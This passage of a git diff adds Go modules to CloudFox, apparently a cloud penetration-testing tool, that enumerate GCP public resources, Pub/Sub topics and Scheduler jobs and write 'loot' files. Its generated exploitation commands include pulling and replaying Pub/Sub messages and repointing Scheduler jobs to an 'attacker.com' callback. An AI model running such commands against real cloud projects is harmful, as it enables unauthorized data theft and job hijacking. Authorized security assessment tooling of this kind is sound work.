gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBLICRESOURCES_MODULE_NAME) + if err != nil { + return + } + + module := &PublicResourcesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Resources: []publicresourcesservice.PublicResource{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PublicResourcesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICRESOURCES_MODULE_NAME, m.processProject) + + if len(m.Resources) == 0 { + logger.InfoM("No public resources found", globals.GCP_PUBLICRESOURCES_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, r := range m.Resources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d public resource(s)", len(m.Resources)), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[ATTACK SURFACE] %d CRITICAL, %d HIGH risk public resources!", criticalCount, highCount), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PublicResourcesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning public resources in project: %s", projectID), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + } + + svc := publicresourcesservice.New() + resources, err := svc.EnumeratePublicResources(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error scanning project %s: %v", projectID, err), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Resources = append(m.Resources, resources...) + + for _, resource := range resources { + m.addResourceToLoot(resource) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d public resource(s) in project %s", len(resources), projectID), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PublicResourcesModule) initializeLootFiles() { + m.LootMap["public-resources-all"] = &internal.LootFile{ + Name: "public-resources-all", + Contents: "# All Public Resources\n# Generated by CloudFox\n\n", + } + m.LootMap["public-resources-critical"] = &internal.LootFile{ + Name: "public-resources-critical", + Contents: "# CRITICAL Risk Public Resources\n# Generated by CloudFox\n# These require immediate attention\n\n", + } + m.LootMap["public-resources-exploit"] = &internal.LootFile{ + Name: "public-resources-exploit", + Contents: "# Public Resource Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["public-endpoints"] = &internal.LootFile{ + Name: "public-endpoints", + Contents: "# Public Endpoints (for scanning)\n# Generated by CloudFox\n\n", + } +} + +func (m *PublicResourcesModule) addResourceToLoot(resource publicresourcesservice.PublicResource) { + // Add to all resources + m.LootMap["public-resources-all"].Contents += fmt.Sprintf( + "## [%s] %s: %s\n"+ + "## Project: %s, Location: %s\n"+ + "## Endpoint: %s\n"+ + "## Access: %s\n\n", + resource.RiskLevel, resource.ResourceType, resource.Name, + resource.ProjectID, resource.Location, + resource.PublicEndpoint, + resource.AccessLevel, + ) + + // Add critical resources separately + if resource.RiskLevel == "CRITICAL" { + m.LootMap["public-resources-critical"].Contents += fmt.Sprintf( + "## [CRITICAL] %s: %s\n"+ + "## Project: %s\n"+ + "## Endpoint: %s\n"+ + "## Access: %s\n"+ + "## Reasons:\n", + resource.ResourceType, resource.Name, + resource.ProjectID, + resource.PublicEndpoint, + resource.AccessLevel, + ) + for _, reason := range resource.RiskReasons { + m.LootMap["public-resources-critical"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["public-resources-critical"].Contents += "\n" + } + + // Add exploit commands + if len(resource.ExploitCommands) > 0 { + m.LootMap["public-resources-exploit"].Contents += fmt.Sprintf( + "## [%s] %s: %s (%s)\n", + resource.RiskLevel, resource.ResourceType, resource.Name, resource.ProjectID, + ) + for _, cmd := range resource.ExploitCommands { + m.LootMap["public-resources-exploit"].Contents += cmd + "\n" + } + m.LootMap["public-resources-exploit"].Contents += "\n" + } + + // Add to endpoints list for scanning + if resource.PublicEndpoint != "" { + m.LootMap["public-endpoints"].Contents += resource.PublicEndpoint + "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main resources table + header := []string{ + "Risk", + "Type", + "Name", + "Endpoint", + "Port", + "Access Level", + "Service Account", + "Project", + } + + var body [][]string + for _, resource := range m.Resources { + saDisplay := resource.ServiceAccount + if saDisplay != "" && len(saDisplay) > 30 { + parts := strings.Split(saDisplay, "@") + if len(parts) > 0 { + saDisplay = parts[0] + "@..." + } + } + if saDisplay == "" { + saDisplay = "-" + } + + endpoint := resource.PublicEndpoint + if len(endpoint) > 50 { + endpoint = endpoint[:50] + "..." + } + + body = append(body, []string{ + resource.RiskLevel, + resource.ResourceType, + resource.Name, + endpoint, + resource.Port, + resource.AccessLevel, + saDisplay, + resource.ProjectID, + }) + } + + // By resource type table + typeHeader := []string{ + "Resource Type", + "Count", + "Critical", + "High", + } + + typeCounts := make(map[string]struct { + total int + critical int + high int + }) + + for _, resource := range m.Resources { + counts := typeCounts[resource.ResourceType] + counts.total++ + if resource.RiskLevel == "CRITICAL" { + counts.critical++ + } else if resource.RiskLevel == "HIGH" { + counts.high++ + } + typeCounts[resource.ResourceType] = counts + } + + var typeBody [][]string + for resourceType, counts := range typeCounts { + typeBody = append(typeBody, []string{ + resourceType, + fmt.Sprintf("%d", counts.total), + fmt.Sprintf("%d", counts.critical), + fmt.Sprintf("%d", counts.high), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "public-resources", + Header: header, + Body: body, + }, + } + + if len(typeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-resources-summary", + Header: typeHeader, + Body: typeBody, + }) + } + + output := PublicResourcesOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBLICRESOURCES_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go new file mode 100644 index 00000000..efcdacaa --- /dev/null +++ b/gcp/commands/pubsub.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPubSubCommand = &cobra.Command{ + Use: globals.GCP_PUBSUB_MODULE_NAME, + Aliases: []string{"ps", "topics", "subscriptions"}, + Short: "Enumerate Pub/Sub topics and subscriptions with security analysis", + Long: `Enumerate Pub/Sub topics and subscriptions across projects with security-relevant details. + +Features: +- Lists all Pub/Sub topics and subscriptions +- Shows IAM configuration and public access +- Identifies push endpoints and their configurations +- Shows dead letter topics and retry policies +- Detects BigQuery and Cloud Storage exports +- Generates gcloud commands for further analysis + +Security Columns: +- PublicPublish: Whether allUsers/allAuthenticatedUsers can publish +- PublicSubscribe: Whether allUsers/allAuthenticatedUsers can subscribe +- KMS: Customer-managed encryption key status +- PushEndpoint: External URL receiving messages (data exfiltration risk) +- Exports: BigQuery/Cloud Storage export destinations + +Attack Surface: +- Public topics allow message injection +- Public subscriptions allow message reading +- Push endpoints may leak sensitive data +- Cross-project subscriptions indicate trust relationships`, + Run: runGCPPubSubCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PubSubModule struct { + gcpinternal.BaseGCPModule + + Topics []PubSubService.TopicInfo + Subscriptions []PubSubService.SubscriptionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PubSubOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PubSubOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PubSubOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPubSubCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBSUB_MODULE_NAME) + if err != nil { + return + } + + module := &PubSubModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Topics: []PubSubService.TopicInfo{}, + Subscriptions: []PubSubService.SubscriptionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) + + totalResources := len(m.Topics) + len(m.Subscriptions) + if totalResources == 0 { + logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) + return + } + + // Count public resources + publicTopics := 0 + publicSubs := 0 + pushSubs := 0 + for _, topic := range m.Topics { + if topic.IsPublicPublish || topic.IsPublicSubscribe { + publicTopics++ + } + } + for _, sub := range m.Subscriptions { + if sub.IsPublicConsume { + publicSubs++ + } + if sub.PushEndpoint != "" { + pushSubs++ + } + } + + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(m.Topics), len(m.Subscriptions)) + if publicTopics > 0 || publicSubs > 0 { + msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) + } + if pushSubs > 0 { + msg += fmt.Sprintf(" [%d push endpoints]", pushSubs) + } + logger.SuccessM(msg, globals.GCP_PUBSUB_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PubSubModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Pub/Sub in project: %s", projectID), globals.GCP_PUBSUB_MODULE_NAME) + } + + ps := PubSubService.New() + + // Get topics + topics, err := ps.Topics(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Pub/Sub topics in project %s: %v", projectID, err), globals.GCP_PUBSUB_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Topics = append(m.Topics, topics...) + for _, topic := range topics { + m.addTopicToLoot(topic) + } + m.mu.Unlock() + } + + // Get subscriptions + subs, err := ps.Subscriptions(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Pub/Sub subscriptions in project %s: %v", projectID, err), globals.GCP_PUBSUB_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Subscriptions = append(m.Subscriptions, subs...) + for _, sub := range subs { + m.addSubscriptionToLoot(sub) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PubSubModule) initializeLootFiles() { + m.LootMap["pubsub-gcloud-commands"] = &internal.LootFile{ + Name: "pubsub-gcloud-commands", + Contents: "# Pub/Sub gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["pubsub-public"] = &internal.LootFile{ + Name: "pubsub-public", + Contents: "# PUBLIC Pub/Sub Resources\n# Generated by CloudFox\n# These resources allow public access!\n\n", + } + m.LootMap["pubsub-push-endpoints"] = &internal.LootFile{ + Name: "pubsub-push-endpoints", + Contents: "# Pub/Sub Push Endpoints\n# Generated by CloudFox\n# Messages are pushed to these URLs\n\n", + } + m.LootMap["pubsub-exploitation"] = &internal.LootFile{ + Name: "pubsub-exploitation", + Contents: "# Pub/Sub Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { + // gcloud commands + m.LootMap["pubsub-gcloud-commands"].Contents += fmt.Sprintf( + "# Topic: %s (Project: %s)\n"+ + "gcloud pubsub topics describe %s --project=%s\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n"+ + "gcloud pubsub topics list-subscriptions %s --project=%s\n\n", + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + ) + + // Public topics + if topic.IsPublicPublish || topic.IsPublicSubscribe { + m.LootMap["pubsub-public"].Contents += fmt.Sprintf( + "# TOPIC: %s\n"+ + "# Project: %s\n"+ + "# Public Publish: %v\n"+ + "# Public Subscribe: %v\n"+ + "# Subscriptions: %d\n\n", + topic.Name, + topic.ProjectID, + topic.IsPublicPublish, + topic.IsPublicSubscribe, + topic.SubscriptionCount, + ) + } + + // Exploitation commands + m.LootMap["pubsub-exploitation"].Contents += fmt.Sprintf( + "# Topic: %s (Project: %s)\n"+ + "# Public Publish: %v, Public Subscribe: %v\n\n"+ + "# Publish a message (if you have pubsub.topics.publish):\n"+ + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n"+ + "# Create a subscription (if you have pubsub.subscriptions.create):\n"+ + "gcloud pubsub subscriptions create my-sub --topic=%s --project=%s\n\n", + topic.Name, topic.ProjectID, + topic.IsPublicPublish, topic.IsPublicSubscribe, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + ) +} + +func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { + // gcloud commands + m.LootMap["pubsub-gcloud-commands"].Contents += fmt.Sprintf( + "# Subscription: %s (Project: %s, Topic: %s)\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n", + sub.Name, sub.ProjectID, sub.Topic, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + ) + + // Push endpoints + if sub.PushEndpoint != "" { + m.LootMap["pubsub-push-endpoints"].Contents += fmt.Sprintf( + "# Subscription: %s\n"+ + "# Project: %s\n"+ + "# Topic: %s\n"+ + "# Push Endpoint: %s\n"+ + "# Service Account: %s\n\n", + sub.Name, + sub.ProjectID, + sub.Topic, + sub.PushEndpoint, + sub.PushServiceAccount, + ) + } + + // Public subscriptions + if sub.IsPublicConsume { + m.LootMap["pubsub-public"].Contents += fmt.Sprintf( + "# SUBSCRIPTION: %s\n"+ + "# Project: %s\n"+ + "# Topic: %s\n"+ + "# Public Consume: true\n\n", + sub.Name, + sub.ProjectID, + sub.Topic, + ) + } + + // Exploitation commands + m.LootMap["pubsub-exploitation"].Contents += fmt.Sprintf( + "# Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n"+ + "# Public Consume: %v\n\n"+ + "# Pull messages (if you have pubsub.subscriptions.consume):\n"+ + "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n"+ + "# Seek to beginning (replay all messages):\n"+ + "gcloud pubsub subscriptions seek %s --time=2020-01-01T00:00:00Z --project=%s\n\n", + sub.Name, sub.ProjectID, + sub.Topic, + sub.IsPublicConsume, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Topics table + topicsHeader := []string{ + "Project ID", + "Topic Name", + "Subscriptions", + "Public Publish", + "Public Subscribe", + "KMS Key", + "Retention", + } + + var topicsBody [][]string + for _, topic := range m.Topics { + // Format public status + publicPublish := "No" + if topic.IsPublicPublish { + publicPublish = "YES" + } + publicSubscribe := "No" + if topic.IsPublicSubscribe { + publicSubscribe = "YES" + } + + // Format KMS key + kmsKey := "-" + if topic.KmsKeyName != "" { + kmsKey = extractKmsKeyName(topic.KmsKeyName) + } + + // Format retention + retention := "-" + if topic.MessageRetentionDuration != "" { + retention = topic.MessageRetentionDuration + } + + topicsBody = append(topicsBody, []string{ + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + publicPublish, + publicSubscribe, + kmsKey, + retention, + }) + } + + // Subscriptions table + subsHeader := []string{ + "Project ID", + "Subscription", + "Topic", + "Type", + "Push Endpoint / Export", + "Public", + "Dead Letter", + "Ack Deadline", + } + + var subsBody [][]string + for _, sub := range m.Subscriptions { + // Determine type + subType := "Pull" + destination := "-" + if sub.PushEndpoint != "" { + subType = "Push" + destination = truncateURL(sub.PushEndpoint) + } else if sub.BigQueryTable != "" { + subType = "BigQuery" + destination = truncateBQ(sub.BigQueryTable) + } else if sub.CloudStorageBucket != "" { + subType = "GCS" + destination = sub.CloudStorageBucket + } + + // Format public status + publicConsume := "No" + if sub.IsPublicConsume { + publicConsume = "YES" + } + + // Format dead letter + deadLetter := "-" + if sub.DeadLetterTopic != "" { + deadLetter = sub.DeadLetterTopic + } + + subsBody = append(subsBody, []string{ + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + publicConsume, + deadLetter, + fmt.Sprintf("%ds", sub.AckDeadlineSeconds), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: topicsHeader, + Body: topicsBody, + }) + } + + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: subsHeader, + Body: subsBody, + }) + } + + output := PubSubOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// extractKmsKeyName extracts just the key name from the full KMS key path +func extractKmsKeyName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +// truncateURL truncates a URL for display +func truncateURL(url string) string { + if len(url) > 45 { + return url[:42] + "..." + } + return url +} + +// truncateBQ truncates a BigQuery table reference for display +func truncateBQ(table string) string { + // Format: project:dataset.table + if len(table) > 40 { + parts := strings.Split(table, ".") + if len(parts) == 2 { + return "..." + parts[1] + } + return "..." + table[len(table)-30:] + } + return table +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go new file mode 100644 index 00000000..91a5631c --- /dev/null +++ b/gcp/commands/scheduler.go @@ -0,0 +1,393 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSchedulerCommand = &cobra.Command{ + Use: globals.GCP_SCHEDULER_MODULE_NAME, + Aliases: []string{"cron", "jobs"}, + Short: "Enumerate Cloud Scheduler jobs with security analysis", + Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Scheduler jobs +- Shows target configuration (HTTP, Pub/Sub, App Engine) +- Identifies service accounts used for authentication +- Shows schedule (cron) expressions +- Displays job state and last execution status +- Generates gcloud commands for job manipulation + +Security Columns: +- Target: HTTP endpoint, Pub/Sub topic, or App Engine service +- ServiceAccount: Identity used when invoking targets +- Schedule: When the job runs (cron expression) +- State: ENABLED, PAUSED, or DISABLED + +Attack Surface: +- HTTP targets may call internal or external endpoints +- Service accounts may have excessive permissions +- Jobs can be modified to call attacker-controlled endpoints +- Paused jobs may indicate suspended malicious activity`, + Run: runGCPSchedulerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SchedulerModule struct { + gcpinternal.BaseGCPModule + + Jobs []SchedulerService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SchedulerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SchedulerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME) + if err != nil { + return + } + + module := &SchedulerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: []SchedulerService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) + return + } + + // Count job states + enabledCount := 0 + httpCount := 0 + for _, job := range m.Jobs { + if job.State == "ENABLED" { + enabledCount++ + } + if job.TargetType == "http" { + httpCount++ + } + } + + msg := fmt.Sprintf("Found %d job(s)", len(m.Jobs)) + if enabledCount > 0 { + msg += fmt.Sprintf(" [%d enabled]", enabledCount) + } + if httpCount > 0 { + msg += fmt.Sprintf(" [%d HTTP targets]", httpCount) + } + logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } + + ss := SchedulerService.New() + + jobs, err := ss.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Scheduler jobs in project %s: %v", projectID, err), globals.GCP_SCHEDULER_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SchedulerModule) initializeLootFiles() { + m.LootMap["scheduler-gcloud-commands"] = &internal.LootFile{ + Name: "scheduler-gcloud-commands", + Contents: "# Cloud Scheduler gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["scheduler-http-targets"] = &internal.LootFile{ + Name: "scheduler-http-targets", + Contents: "# Cloud Scheduler HTTP Targets\n# Generated by CloudFox\n# These URLs are called by scheduled jobs\n\n", + } + m.LootMap["scheduler-service-accounts"] = &internal.LootFile{ + Name: "scheduler-service-accounts", + Contents: "# Cloud Scheduler Service Accounts\n# Generated by CloudFox\n# Service accounts used for job authentication\n\n", + } + m.LootMap["scheduler-exploitation"] = &internal.LootFile{ + Name: "scheduler-exploitation", + Contents: "# Cloud Scheduler Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { + // gcloud commands + m.LootMap["scheduler-gcloud-commands"].Contents += fmt.Sprintf( + "# Job: %s (Project: %s, Location: %s)\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s # Trigger immediately\n\n", + job.Name, job.ProjectID, job.Location, + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + // HTTP targets + if job.TargetType == "http" { + m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf( + "# Job: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Method: %s\n"+ + "# URL: %s\n"+ + "# Auth: %s\n", + job.Name, + job.Schedule, job.TimeZone, + job.TargetHTTPMethod, + job.TargetURI, + job.AuthType, + ) + if job.ServiceAccount != "" { + m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + m.LootMap["scheduler-http-targets"].Contents += "\n" + } + + // Service accounts + if job.ServiceAccount != "" { + m.LootMap["scheduler-service-accounts"].Contents += fmt.Sprintf( + "# Job: %s -> %s %s\n"+ + "%s\n\n", + job.Name, job.TargetType, formatTarget(job), + job.ServiceAccount, + ) + } + + // Exploitation commands + m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( + "# Job: %s (Project: %s)\n"+ + "# State: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Target: %s -> %s\n", + job.Name, job.ProjectID, + job.State, + job.Schedule, job.TimeZone, + job.TargetType, formatTarget(job), + ) + + if job.ServiceAccount != "" { + m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + + m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( + "\n# Run job immediately:\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ + "# Pause job:\n"+ + "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + if job.TargetType == "http" { + m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( + "# Update job to call attacker endpoint (if you have cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"https://attacker.com/callback\"\n\n", + job.Name, job.Location, job.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Jobs table + header := []string{ + "Project ID", + "Job Name", + "Location", + "State", + "Schedule", + "Target Type", + "Target", + "Service Account", + "Last Run", + } + + var body [][]string + for _, job := range m.Jobs { + // Format target + target := formatTarget(job) + + // Format service account + sa := "-" + if job.ServiceAccount != "" { + sa = truncateSAScheduler(job.ServiceAccount) + } + + // Format last run + lastRun := "-" + if job.LastAttemptTime != "" { + lastRun = formatTime(job.LastAttemptTime) + if job.Status != "" && job.Status != "OK" { + lastRun += " (FAILED)" + } + } + + body = append(body, []string{ + job.ProjectID, + job.Name, + job.Location, + job.State, + job.Schedule, + job.TargetType, + target, + sa, + lastRun, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := SchedulerOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatTarget formats the job target for display +func formatTarget(job SchedulerService.JobInfo) string { + switch job.TargetType { + case "http": + if len(job.TargetURI) > 50 { + return job.TargetURI[:47] + "..." + } + return job.TargetURI + case "pubsub": + return job.TargetTopic + case "appengine": + target := job.TargetService + if job.TargetVersion != "" { + target += "/" + job.TargetVersion + } + if job.TargetURI != "" { + target += job.TargetURI + } + return target + default: + return "-" + } +} + +// truncateSAScheduler truncates service account for display +func truncateSAScheduler(sa string) string { + if len(sa) > 35 { + if idx := strings.Index(sa, "@"); idx > 0 { + name := sa[:idx] + if len(name) > 25 { + return name[:22] + "...@..." + } + return name + "@..." + } + return sa[:32] 